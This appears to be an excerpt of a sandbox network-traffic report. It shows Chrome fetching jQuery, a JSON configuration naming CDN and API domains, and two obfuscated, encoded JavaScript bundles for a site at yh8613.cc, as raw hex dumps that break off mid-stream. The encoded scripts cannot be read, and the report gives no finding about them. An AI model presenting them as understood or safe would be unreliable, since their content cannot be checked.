                                                                                                                                                          2024-06-09 22:41:10 UTC537OUTGET /pc/lib/jquery.min-1.9.1.js HTTP/1.1
                                                                                                                                                          Host: zb-qq.gzjqwlkj.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                                                          Referer: https://yh8613.cc/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:11 UTC342INHTTP/1.1 200 OK
                                                                                                                                                          Last-Modified: Wed, 31 Jan 2018 01:18:42 GMT
                                                                                                                                                          Etag: "5a711972-169d6"
                                                                                                                                                          Server: Tengine
                                                                                                                                                          Date: Sun, 09 Jun 2024 12:31:58 GMT
                                                                                                                                                          Content-Type: application/javascript
                                                                                                                                                          Content-Length: 92630
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          X-NWS-LOG-UUID: 12308733086560878634
                                                                                                                                                          Connection: close
                                                                                                                                                          X-Cache-Lookup: Cache Hit
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:11 UTC16384INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 31 2e 39 2e 31 20 7c 20 28 63 29 20 32 30 30 35 2c 20 32 30 31 32 20 6a 51 75 65 72 79 20 46 6f 75 6e 64 61 74 69 6f 6e 2c 20 49 6e 63 2e 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 0a 2f 2f 40 20 73 6f 75 72 63 65 4d 61 70 70 69 6e 67 55 52 4c 3d 6a 71 75 65 72 79 2e 6d 69 6e 2e 6d 61 70 0a 2a 2f 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 2c 72 2c 69 3d 74 79 70 65 6f 66 20 74 2c 6f 3d 65 2e 64 6f 63 75 6d 65 6e 74 2c 61 3d 65 2e 6c 6f 63 61 74 69 6f 6e 2c 73 3d 65 2e 6a 51 75 65 72 79 2c 75 3d 65 2e 24 2c 6c 3d 7b 7d 2c 63 3d 5b 5d 2c 70 3d 22 31 2e 39 2e 31 22 2c 66 3d 63 2e 63 6f 6e 63 61 74 2c 64 3d 63 2e 70 75 73 68 2c 68 3d 63 2e 73 6c 69 63 65 2c 67 3d 63 2e 69 6e 64 65 78 4f
                                                                                                                                                          Data Ascii: /*! jQuery v1.9.1 | (c) 2005, 2012 jQuery Foundation, Inc. | jquery.org/license//@ sourceMappingURL=jquery.min.map*/(function(e,t){var n,r,i=typeof t,o=e.document,a=e.location,s=e.jQuery,u=e.$,l={},c=[],p="1.9.1",f=c.concat,d=c.push,h=c.slice,g=c.indexO
                                                                                                                                                          2024-06-09 22:41:11 UTC16384INData Raw: 2e 65 78 74 65 6e 64 28 7b 71 75 65 75 65 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 6e 2c 72 29 7b 76 61 72 20 69 3b 72 65 74 75 72 6e 20 65 3f 28 6e 3d 28 6e 7c 7c 22 66 78 22 29 2b 22 71 75 65 75 65 22 2c 69 3d 62 2e 5f 64 61 74 61 28 65 2c 6e 29 2c 72 26 26 28 21 69 7c 7c 62 2e 69 73 41 72 72 61 79 28 72 29 3f 69 3d 62 2e 5f 64 61 74 61 28 65 2c 6e 2c 62 2e 6d 61 6b 65 41 72 72 61 79 28 72 29 29 3a 69 2e 70 75 73 68 28 72 29 29 2c 69 7c 7c 5b 5d 29 3a 74 7d 2c 64 65 71 75 65 75 65 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 74 3d 74 7c 7c 22 66 78 22 3b 76 61 72 20 6e 3d 62 2e 71 75 65 75 65 28 65 2c 74 29 2c 72 3d 6e 2e 6c 65 6e 67 74 68 2c 69 3d 6e 2e 73 68 69 66 74 28 29 2c 6f 3d 62 2e 5f 71 75 65 75 65 48 6f 6f 6b 73 28 65 2c 74 29 2c 61 3d 66 75 6e 63
                                                                                                                                                          Data Ascii: .extend({queue:function(e,n,r){var i;return e?(n=(n||"fx")+"queue",i=b._data(e,n),r&&(!i||b.isArray(r)?i=b._data(e,n,b.makeArray(r)):i.push(r)),i||[]):t},dequeue:function(e,t){t=t||"fx";var n=b.queue(e,t),r=n.length,i=n.shift(),o=b._queueHooks(e,t),a=func
                                                                                                                                                          2024-06-09 22:41:11 UTC16384INData Raw: 21 65 2e 69 73 54 72 69 67 67 65 72 26 26 62 2e 65 76 65 6e 74 2e 73 69 6d 75 6c 61 74 65 28 22 73 75 62 6d 69 74 22 2c 74 68 69 73 2e 70 61 72 65 6e 74 4e 6f 64 65 2c 65 2c 21 30 29 29 7d 2c 74 65 61 72 64 6f 77 6e 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 62 2e 6e 6f 64 65 4e 61 6d 65 28 74 68 69 73 2c 22 66 6f 72 6d 22 29 3f 21 31 3a 28 62 2e 65 76 65 6e 74 2e 72 65 6d 6f 76 65 28 74 68 69 73 2c 22 2e 5f 73 75 62 6d 69 74 22 29 2c 74 29 7d 7d 29 2c 62 2e 73 75 70 70 6f 72 74 2e 63 68 61 6e 67 65 42 75 62 62 6c 65 73 7c 7c 28 62 2e 65 76 65 6e 74 2e 73 70 65 63 69 61 6c 2e 63 68 61 6e 67 65 3d 7b 73 65 74 75 70 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 5a 2e 74 65 73 74 28 74 68 69 73 2e 6e 6f 64 65 4e 61 6d 65 29 3f 28 28
                                                                                                                                                          Data Ascii: !e.isTrigger&&b.event.simulate("submit",this.parentNode,e,!0))},teardown:function(){return b.nodeName(this,"form")?!1:(b.event.remove(this,"._submit"),t)}}),b.support.changeBubbles||(b.event.special.change={setup:function(){return Z.test(this.nodeName)?((
                                                                                                                                                          2024-06-09 22:41:11 UTC16384INData Raw: 57 2c 22 20 22 29 7d 29 2c 73 3d 73 2e 73 6c 69 63 65 28 6e 2e 6c 65 6e 67 74 68 29 29 3b 66 6f 72 28 61 20 69 6e 20 69 2e 66 69 6c 74 65 72 29 21 28 72 3d 55 5b 61 5d 2e 65 78 65 63 28 73 29 29 7c 7c 6c 5b 61 5d 26 26 21 28 72 3d 6c 5b 61 5d 28 72 29 29 7c 7c 28 6e 3d 72 2e 73 68 69 66 74 28 29 2c 6f 2e 70 75 73 68 28 7b 76 61 6c 75 65 3a 6e 2c 74 79 70 65 3a 61 2c 6d 61 74 63 68 65 73 3a 72 7d 29 2c 73 3d 73 2e 73 6c 69 63 65 28 6e 2e 6c 65 6e 67 74 68 29 29 3b 69 66 28 21 6e 29 62 72 65 61 6b 7d 72 65 74 75 72 6e 20 74 3f 73 2e 6c 65 6e 67 74 68 3a 73 3f 73 74 2e 65 72 72 6f 72 28 65 29 3a 45 28 65 2c 75 29 2e 73 6c 69 63 65 28 30 29 7d 66 75 6e 63 74 69 6f 6e 20 64 74 28 65 29 7b 76 61 72 20 74 3d 30 2c 6e 3d 65 2e 6c 65 6e 67 74 68 2c 72 3d 22 22 3b
                                                                                                                                                          Data Ascii: W," ")}),s=s.slice(n.length));for(a in i.filter)!(r=U[a].exec(s))||l[a]&&!(r=l[a](r))||(n=r.shift(),o.push({value:n,type:a,matches:r}),s=s.slice(n.length));if(!n)break}return t?s.length:s?st.error(e):E(e,u).slice(0)}function dt(e){var t=0,n=e.length,r="";
                                                                                                                                                          2024-06-09 22:41:11 UTC16384INData Raw: 72 6e 20 74 3b 72 65 74 75 72 6e 20 72 7d 66 75 6e 63 74 69 6f 6e 20 6e 6e 28 65 2c 74 29 7b 72 65 74 75 72 6e 20 65 3d 74 7c 7c 65 2c 22 6e 6f 6e 65 22 3d 3d 3d 62 2e 63 73 73 28 65 2c 22 64 69 73 70 6c 61 79 22 29 7c 7c 21 62 2e 63 6f 6e 74 61 69 6e 73 28 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 2c 65 29 7d 66 75 6e 63 74 69 6f 6e 20 72 6e 28 65 2c 74 29 7b 76 61 72 20 6e 2c 72 2c 69 2c 6f 3d 5b 5d 2c 61 3d 30 2c 73 3d 65 2e 6c 65 6e 67 74 68 3b 66 6f 72 28 3b 73 3e 61 3b 61 2b 2b 29 72 3d 65 5b 61 5d 2c 72 2e 73 74 79 6c 65 26 26 28 6f 5b 61 5d 3d 62 2e 5f 64 61 74 61 28 72 2c 22 6f 6c 64 64 69 73 70 6c 61 79 22 29 2c 6e 3d 72 2e 73 74 79 6c 65 2e 64 69 73 70 6c 61 79 2c 74 3f 28 6f 5b 61 5d 7c 7c 22 6e 6f 6e 65 22 21 3d 3d 6e 7c 7c 28 72 2e 73 74
                                                                                                                                                          Data Ascii: rn t;return r}function nn(e,t){return e=t||e,"none"===b.css(e,"display")||!b.contains(e.ownerDocument,e)}function rn(e,t){var n,r,i,o=[],a=0,s=e.length;for(;s>a;a++)r=e[a],r.style&&(o[a]=b._data(r,"olddisplay"),n=r.style.display,t?(o[a]||"none"!==n||(r.st
                                                                                                                                                          2024-06-09 22:41:11 UTC10710INData Raw: 7c 7c 69 5b 22 58 2d 52 65 71 75 65 73 74 65 64 2d 57 69 74 68 22 5d 7c 7c 28 69 5b 22 58 2d 52 65 71 75 65 73 74 65 64 2d 57 69 74 68 22 5d 3d 22 58 4d 4c 48 74 74 70 52 65 71 75 65 73 74 22 29 3b 74 72 79 7b 66 6f 72 28 73 20 69 6e 20 69 29 75 2e 73 65 74 52 65 71 75 65 73 74 48 65 61 64 65 72 28 73 2c 69 5b 73 5d 29 7d 63 61 74 63 68 28 6c 29 7b 7d 75 2e 73 65 6e 64 28 6e 2e 68 61 73 43 6f 6e 74 65 6e 74 26 26 6e 2e 64 61 74 61 7c 7c 6e 75 6c 6c 29 2c 72 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 69 29 7b 76 61 72 20 73 2c 6c 2c 63 2c 70 3b 74 72 79 7b 69 66 28 72 26 26 28 69 7c 7c 34 3d 3d 3d 75 2e 72 65 61 64 79 53 74 61 74 65 29 29 69 66 28 72 3d 74 2c 61 26 26 28 75 2e 6f 6e 72 65 61 64 79 73 74 61 74 65 63 68 61 6e 67 65 3d 62 2e 6e 6f 6f 70 2c 24 6e 26
                                                                                                                                                          Data Ascii: ||i["X-Requested-With"]||(i["X-Requested-With"]="XMLHttpRequest");try{for(s in i)u.setRequestHeader(s,i[s])}catch(l){}u.send(n.hasContent&&n.data||null),r=function(e,i){var s,l,c,p;try{if(r&&(i||4===u.readyState))if(r=t,a&&(u.onreadystatechange=b.noop,$n&


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          362192.168.2.5501353.165.113.624434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:10 UTC372OUTGET /ocs/zbw?r=9375188508 HTTP/1.1
                                                                                                                                                          Host: ocsapi-aka.blackkhaki918.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:11 UTC531INHTTP/1.1 200 OK
                                                                                                                                                          Content-Type: text/plain; charset=utf-8
                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: Tengine
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:11 GMT
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          Api-Elapsed: 0.0000
                                                                                                                                                          X-Node: outer
                                                                                                                                                          X-Via: 1.1 aws:jp (Cdn Cache Server V2.0), 1.1 ocsapi:00 (Cdn Cache Server V2.0)
                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                          X-Cache: Miss from cloudfront
                                                                                                                                                          Via: 1.1 b8fdbe0731ea973153de1009ba25feaa.cloudfront.net (CloudFront)
                                                                                                                                                          X-Amz-Cf-Pop: CDG50-P3
                                                                                                                                                          X-Amz-Cf-Id: UMOIzpFi5-6JAGSLunbgdEZjKsvYHlRVqxtx17flWp2B6ZM6YOVPwQ==
                                                                                                                                                          2024-06-09 22:41:11 UTC12489INData Raw: 33 30 63 31 0d 0a 7b 0a 20 20 20 20 22 6e 6e 6e 22 3a 20 22 6f 75 74 65 72 2d 38 38 38 22 2c 0a 20 20 20 20 22 76 65 72 73 69 6f 6e 73 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 22 7a 62 5f 6d 22 3a 20 22 32 34 30 36 30 36 2d 30 31 22 2c 0a 20 20 20 20 20 20 20 20 22 7a 62 5f 70 63 5f 6d 65 6d 62 65 72 22 3a 20 22 32 34 30 35 32 39 2d 30 31 22 0a 20 20 20 20 7d 2c 0a 20 20 20 20 22 68 74 74 70 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 22 43 44 4e 5f 50 41 54 48 53 22 3a 20 5b 22 7a 62 2d 71 71 2e 67 7a 6a 71 77 6c 6b 6a 2e 63 6f 6d 22 2c 22 7a 62 31 2d 68 77 2e 71 65 63 74 79 6f 75 61 2e 63 6f 6d 22 2c 22 7a 62 2d 68 77 2e 63 7a 77 79 67 73 2e 63 6f 6d 22 5d 2c 0a 20 20 20 20 20 20 20 20 22 41 50 49 5f 44 4f 4d 41 49 4e 53 22 3a 20 5b 22 6f 63 73 61 70 69 2d 6c
                                                                                                                                                          Data Ascii: 30c1{ "nnn": "outer-888", "versions": { "zb_m": "240606-01", "zb_pc_member": "240529-01" }, "http": { "CDN_PATHS": ["zb-qq.gzjqwlkj.com","zb1-hw.qectyoua.com","zb-hw.czwygs.com"], "API_DOMAINS": ["ocsapi-l
                                                                                                                                                          2024-06-09 22:41:11 UTC1455INData Raw: 35 61 38 0d 0a 31 30 30 35 2d 30 31 22 2c 22 74 22 3a 31 31 30 7d 2c 0a 09 22 74 33 39 30 32 22 3a 20 7b 22 76 22 3a 22 32 34 30 35 31 36 2d 30 33 22 2c 22 74 22 3a 31 30 38 7d 2c 0a 09 22 74 33 39 30 33 22 3a 20 7b 22 76 22 3a 22 32 33 30 36 32 30 2d 30 31 22 2c 22 74 22 3a 31 30 34 7d 2c 0a 09 22 74 33 39 30 34 22 3a 20 22 32 33 31 30 30 35 2d 30 31 22 2c 0a 09 22 74 33 39 30 35 22 3a 20 22 32 33 30 36 30 37 2d 30 31 22 2c 0a 09 22 74 33 39 30 39 22 3a 20 7b 22 76 22 3a 22 32 33 30 36 30 37 2d 30 31 22 2c 22 74 22 3a 31 30 38 7d 2c 0a 09 22 74 33 39 31 30 22 3a 20 7b 22 76 22 3a 22 32 34 30 35 31 36 2d 30 33 22 2c 22 74 22 3a 31 30 39 7d 2c 0a 09 22 74 33 39 31 32 22 3a 20 22 32 33 31 30 30 35 2d 30 31 22 2c 0a 09 22 74 33 39 31 34 22 3a 20 7b 22 76 22
                                                                                                                                                          Data Ascii: 5a81005-01","t":110},"t3902": {"v":"240516-03","t":108},"t3903": {"v":"230620-01","t":104},"t3904": "231005-01","t3905": "230607-01","t3909": {"v":"230607-01","t":108},"t3910": {"v":"240516-03","t":109},"t3912": "231005-01","t3914": {"v"
                                                                                                                                                          2024-06-09 22:41:11 UTC4467INData Raw: 31 31 36 62 0d 0a 7d 2c 0a 09 22 74 33 39 36 33 22 3a 20 7b 22 76 22 3a 22 32 33 30 36 32 30 2d 30 31 22 2c 22 74 22 3a 31 31 32 7d 2c 0a 09 22 74 33 39 36 34 22 3a 20 22 32 33 30 36 30 37 2d 30 31 22 2c 0a 09 22 74 33 39 36 35 22 3a 20 22 32 34 30 35 31 36 2d 30 33 22 2c 0a 09 22 74 33 39 37 31 22 3a 20 7b 22 76 22 3a 22 32 33 30 38 31 38 2d 30 34 22 2c 22 74 22 3a 31 30 31 7d 2c 0a 09 22 74 33 39 37 32 22 3a 20 7b 22 76 22 3a 22 32 33 30 36 31 33 2d 30 33 22 2c 22 74 22 3a 31 31 30 7d 2c 0a 09 22 74 33 39 37 33 22 3a 20 7b 22 76 22 3a 22 32 33 30 36 30 37 2d 30 31 22 2c 22 74 22 3a 31 30 34 7d 2c 0a 09 22 74 33 39 37 34 22 3a 20 7b 22 76 22 3a 22 32 33 30 36 31 33 2d 30 33 22 2c 22 74 22 3a 31 30 31 7d 2c 0a 09 22 74 33 39 37 35 22 3a 20 7b 22 76 22 3a
                                                                                                                                                          Data Ascii: 116b},"t3963": {"v":"230620-01","t":112},"t3964": "230607-01","t3965": "240516-03","t3971": {"v":"230818-04","t":101},"t3972": {"v":"230613-03","t":110},"t3973": {"v":"230607-01","t":104},"t3974": {"v":"230613-03","t":101},"t3975": {"v":
                                                                                                                                                          2024-06-09 22:41:11 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                          Data Ascii: 0


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          363192.168.2.55012254.150.37.1304434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:10 UTC545OUTGET /pc/240516-03/static/js/manifest.js HTTP/1.1
                                                                                                                                                          Host: zb-qq.gzjqwlkj.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                                                          Referer: https://yh8613.cc/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:11 UTC340INHTTP/1.1 200 OK
                                                                                                                                                          Last-Modified: Thu, 16 May 2024 08:59:00 GMT
                                                                                                                                                          Etag: "6645cad4-48c8"
                                                                                                                                                          Server: Tengine
                                                                                                                                                          Date: Sun, 09 Jun 2024 17:13:35 GMT
                                                                                                                                                          Content-Type: application/javascript
                                                                                                                                                          Content-Length: 18632
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          X-NWS-LOG-UUID: 6543040924288632866
                                                                                                                                                          Connection: close
                                                                                                                                                          X-Cache-Lookup: Cache Hit
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:11 UTC16384INData Raw: 61 34 76 6a 65 75 75 65 28 22 49 51 4d 77 72 67 64 67 78 67 4c 67 6c 67 65 77 67 43 67 51 53 67 4e 34 44 63 43 47 41 6e 41 41 67 47 63 42 65 41 64 7a 67 67 42 4d 45 79 41 36 4d 67 55 77 43 4d 41 48 48 4b 41 61 77 43 6b 69 6c 57 41 33 42 57 71 30 47 4c 64 6c 31 37 38 53 34 61 50 43 54 49 59 41 47 67 43 32 53 67 46 61 59 51 43 50 4d 6c 79 46 57 53 75 45 72 78 4b 6f 4a 41 41 78 4b 41 4e 69 51 44 61 41 58 51 46 51 41 50 44 44 72 58 47 45 41 4f 59 77 41 46 73 34 41 31 49 46 6f 63 43 51 77 64 6c 41 4f 53 6f 78 32 63 41 34 41 5a 41 6e 57 64 4b 78 67 52 48 37 49 73 66 46 32 46 67 35 6f 4d 58 45 4f 6c 67 4c 61 75 71 77 45 6c 41 51 71 61 41 44 79 7a 4f 71 4d 73 4b 6c 34 43 44 42 74 41 4a 36 73 6a 48 52 2b 4f 45 53 31 5a 42 41 41 43 71 33 64 65 44 41 64 64 46 41 34
                                                                                                                                                          Data Ascii: a4vjeuue("IQMwrgdgxgLglgewgCgQSgN4DcCGAnAAgGcBeAdzggBMEyA6MgUwCMAHHKAawCkilWA3BWq0GLdl178S4aPCTIYAGgC2SgFaYQCPMlyFWSuErxKoJAAxKANiQDaAXQFQAPDDrXGEAOYwAFs4A1IFocCQwdlAOSox2cA4AZAnWdKxgRH7IsfF2Fg5oMXEOlgLauqwElAQqaADyzOqMsKl4CDBtAJ6sjHR+OES1ZBAACq3deDAddFA4
                                                                                                                                                          2024-06-09 22:41:11 UTC2248INData Raw: 54 66 47 31 30 42 4a 57 6e 72 53 7a 2b 4e 74 6c 35 44 31 6f 72 2f 6e 73 67 5a 6f 30 4a 4a 2f 34 74 6f 33 66 72 2f 35 79 55 2b 45 6b 72 34 33 2b 33 61 42 69 35 63 65 50 38 4f 50 35 6a 6b 6f 2f 73 31 4c 34 53 68 6e 6e 32 34 2f 77 59 36 44 32 69 7a 2b 58 55 70 67 45 48 2b 66 55 75 4f 68 49 2b 47 30 44 2f 44 31 6b 6b 35 4a 76 34 63 75 78 45 76 41 48 46 2b 71 6f 72 6d 67 6a 6f 72 2f 6f 58 59 72 57 45 33 69 66 34 72 53 41 35 43 46 37 4b 75 37 38 4f 50 34 6e 49 73 2f 6d 61 49 73 42 42 2f 67 33 5a 7a 57 39 48 67 44 44 4e 32 77 67 51 6d 37 76 77 6c 61 43 75 68 38 42 4b 35 50 39 36 4c 2b 42 72 6e 4e 62 2b 2b 46 2f 70 33 79 30 53 50 2f 73 6f 45 37 6f 4f 2f 6e 51 46 6a 32 69 67 51 66 35 48 59 54 36 4f 33 34 58 2b 38 59 76 6f 45 53 42 79 59 73 59 47 7a 2b 47 59 73 59
                                                                                                                                                          Data Ascii: TfG10BJWnrSz+Ntl5D1or/nsgZo0JJ/4to3fr/5yU+Ekr43+3aBi5ceP8OP5jko/s1L4Shnn24/wY6D2iz+XUpgEH+fUuOhI+G0D/D1kk5Jv4cuxEvAHF+qormgjor/oXYrWE3if4rSA5CF7Ku78OP4nIs/maIsBB/g3ZzW9HgDDN2wgQm7vwlaCuh8BK5P96L+BrnNb++F/p3y0SP/soE7oO/nQFj2igQf5HYT6O34X+8YvoESByYsYGz+GYsY


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          364192.168.2.55012454.150.37.1304434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:10 UTC543OUTGET /pc/240516-03/static/js/vendor.js HTTP/1.1
                                                                                                                                                          Host: zb-qq.gzjqwlkj.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                                                          Referer: https://yh8613.cc/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:11 UTC342INHTTP/1.1 200 OK
                                                                                                                                                          Last-Modified: Thu, 16 May 2024 09:02:59 GMT
                                                                                                                                                          Etag: "6645cbc3-24f1c"
                                                                                                                                                          Server: Tengine
                                                                                                                                                          Date: Sun, 09 Jun 2024 17:13:35 GMT
                                                                                                                                                          Content-Type: application/javascript
                                                                                                                                                          Content-Length: 151324
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          X-NWS-LOG-UUID: 2211241621101308777
                                                                                                                                                          Connection: close
                                                                                                                                                          X-Cache-Lookup: Cache Hit
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:11 UTC16384INData Raw: 61 34 76 6a 65 75 75 65 28 22 4f 34 55 77 52 67 44 67 68 67 78 67 31 67 4b 51 4d 34 48 73 42 32 45 41 55 42 74 41 6a 4c 67 54 67 44 59 42 64 41 47 67 47 38 41 69 41 61 67 43 59 61 6b 71 41 75 41 4d 77 46 63 30 59 41 58 41 53 33 55 7a 63 79 49 4d 6d 67 43 55 31 64 6b 68 41 41 43 4a 4e 77 42 4f 76 48 6c 51 44 63 41 4e 79 67 4b 5a 43 67 4c 78 70 4d 56 41 43 4a 49 41 72 41 41 55 71 59 73 72 33 32 47 41 4c 41 51 43 4f 41 4c 79 75 59 41 68 41 41 59 78 71 68 5a 67 55 41 4f 6e 4d 79 4b 67 42 6c 52 56 34 30 41 48 4d 71 53 69 68 75 4e 6b 34 65 66 67 4e 75 43 51 55 51 62 6e 59 46 4e 42 6c 65 51 51 41 4c 58 69 51 79 64 49 42 66 63 72 46 79 30 4a 6f 41 59 51 42 5a 41 68 59 4f 4c 6a 34 42 49 52 46 78 53 57 6b 35 53 4a 55 4e 4c 52 30 37 59 7a 4e 4c 61 31 73 44 4b 68 52
                                                                                                                                                          Data Ascii: a4vjeuue("O4UwRgDghgxg1gKQM4HsB2EAUBtAjLgTgDYBdAGgG8AiAagCYakqAuAMwFc0YAXAS3UzcyIMmgCU1dkhAACJNwBOvHlQDcANygKZCgLxpMVACJIArAAUqYsr32GALAQCOALyuYAhAAYxqhZgUAOnMyKgBlRV40AHMqSihuNk4efgNuCQUQbnYFNBleQQALXiQydIBfcrFy0JoAYQBZAhYOLj4BIRFxSWk5SJUNLR07YzNLa1sDKhR
                                                                                                                                                          2024-06-09 22:41:11 UTC16384INData Raw: 75 67 4d 70 75 33 51 37 72 66 2f 4a 75 38 55 41 77 4c 74 51 45 59 45 6a 36 77 34 6c 67 74 2b 41 62 45 53 42 67 2f 35 37 6f 38 41 42 61 35 68 51 75 44 73 61 77 51 67 51 51 4a 51 4b 6e 34 69 50 41 77 49 6f 42 31 41 75 42 69 59 34 48 63 4a 73 42 48 67 46 54 47 49 43 77 34 53 41 4f 6e 67 7a 61 55 53 4e 4c 42 2f 6f 49 56 4e 2f 44 4d 59 70 41 59 79 42 2f 6f 65 45 4b 6f 41 51 42 30 74 41 52 43 49 51 6d 43 4a 55 43 34 4f 44 41 59 55 71 6d 63 78 31 41 56 41 73 42 4b 74 4b 63 67 67 41 72 58 49 41 6a 65 41 33 5a 47 39 34 36 77 67 55 4a 6b 41 4a 41 49 41 50 50 42 49 73 33 73 4e 73 43 47 41 69 34 4b 67 78 63 6b 6d 43 4d 4b 35 67 41 72 66 72 51 47 62 41 6c 41 4a 6e 36 77 41 67 50 49 32 51 55 71 48 75 4f 77 45 45 57 33 6e 4c 67 48 74 45 36 6d 43 63 43 4d 67 74 7a 43 37
                                                                                                                                                          Data Ascii: ugMpu3Q7rf/Ju8UAwLtQEYEj6w4lgt+AbESBg/57o8ABa5hQuDsawQgQQJQKn4iPAwIoB1AuBiY4HcJsBHgFTGICw4SAOngzaUSNLB/oIVN/DMYpAYyB/oeEKoAQB0tARCIQmCJUC4ODAYUqmcx1AVAsBKtKcggArXIAjeA3ZG946wgUJkAJAIAPPBIs3sNsCGAi4KgxckmCMK5gArfrQGbAlAJn6wAgPI2QUqHuOwEEW3nLgHtE6mCcCMgtzC7
                                                                                                                                                          2024-06-09 22:41:11 UTC16384INData Raw: 49 33 49 4e 36 45 41 71 6b 69 33 75 52 32 6e 65 59 67 44 49 44 56 57 74 65 6d 47 43 6b 33 74 54 73 6f 42 50 67 44 70 62 6e 41 41 33 35 74 79 4e 65 48 58 31 74 39 38 49 37 34 50 39 50 4c 63 6b 74 57 33 6d 62 66 72 58 4f 4e 31 62 66 61 75 6d 49 44 67 72 79 33 54 67 4d 62 65 79 33 31 35 47 48 66 77 33 6e 35 31 31 63 2f 58 2b 30 50 74 42 77 33 67 42 37 37 65 64 58 33 35 37 4e 63 4a 55 6d 41 48 48 66 63 33 2b 6e 53 4c 64 69 33 32 64 34 68 65 70 33 55 4e 34 50 44 39 67 52 67 4c 31 41 79 33 61 6c 7a 78 64 50 6e 57 6c 2b 48 65 55 33 35 64 37 6e 63 39 58 64 41 4c 45 4b 6d 41 4e 47 4c 45 48 46 33 6a 64 36 4c 66 4e 33 77 4e 78 58 63 39 58 77 2f 47 45 41 4e 33 51 46 2f 33 66 4a 33 6e 56 7a 39 65 2f 51 67 38 49 50 44 68 6f 62 53 47 45 42 4d 75 67 39 2f 68 65 6f 56 55
